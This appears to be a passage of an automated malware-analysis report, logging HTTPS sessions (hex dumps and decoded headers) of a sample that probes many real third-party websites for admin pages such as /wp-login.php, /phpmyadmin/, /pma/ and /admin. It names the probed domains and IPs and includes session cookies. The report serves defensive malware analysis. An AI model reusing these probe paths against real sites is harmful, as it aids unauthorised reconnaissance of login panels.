                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16312INData Raw: 33 46 42 30 0d 0a 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62
                                                                                                                                                                                                    Data Ascii: 3FB0us-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/b
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16320INData Raw: 33 46 42 38 0d 0a 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 66 6c 65 78 70 65 73 2f 62 65 61 6d 6c 69 6e 65 2d 6f 70 74 69 63 73 2f 78 2d 72 61 79 2d 73 6f 75 72 63 65 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 58 2d 72 61 79 20 73 6f 75 72 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d
                                                                                                                                                                                                    Data Ascii: 3FB8m-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/flexpes/beamline-optics/x-ray-source/" class="menu-item-label">X-ray source</a></li></ul></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16320INData Raw: 33 46 42 38 0d 0a 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 50 6f 73 74 20 62 65 61 6d 74 69 6d 65 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20
                                                                                                                                                                                                    Data Ascii: 3FB8user-information/experimental-station/" class="menu-item-label">Post beamtime</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    541192.168.2.45623595.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC295OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=5afd37c218f5676376cb43a26fed2bbc|11f187638643e13d7bd1963991fac52b; OF=v9cu3s0m473ercltrbqt6cbio0
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:59 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    542192.168.2.456254185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC329INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 317Connection: closeLocation: http://www.grantstech.io/adminCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:5
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/admin">here</a>.</p><hr><address>Apache/2.4.56 (Deb


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    543192.168.2.456137120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC183OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC529INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 30 70 66 70 76 36 66 69 63 36 74 73 63 65 69 38 6c 32 6b 72 67 6e 63 76 74 6f 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 36 3a 35 39 3a 35 39 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:59 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=0pfpv6fic6tscei8l2krgncvto; expires=Sun, 26-Nov-2023 06:59:59 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    544192.168.2.456116117.20.63.1484436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 0d 0a 58 2d 43 61 63 68 65 3a 20 48 49 54 20 66 72 6f 6d 20 42 61 63 6b 65 6e 64 0d 0a 53 74 72 69 63 74 2d 54 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginx/1.20.1Date: Sun, 26 Nov 2023 05:59:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 238Connection: closeLocation: http://117.20.63.148:2030/pma/X-Cache: HIT from BackendStrict-Tra
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://117.20.63.148:2030/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    545192.168.2.456258185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC167OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC327INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 6d 61 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 316Connection: closeLocation: http://www.grantstech.io/pma/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:59
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC316INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/pma/">here</a>.</p><hr><address>Apache/2.4.56 (Debi


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    546192.168.2.455706164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC172OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:59 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC6267INData Raw: 31 38 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 1873<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    547192.168.2.45626415.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:59 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
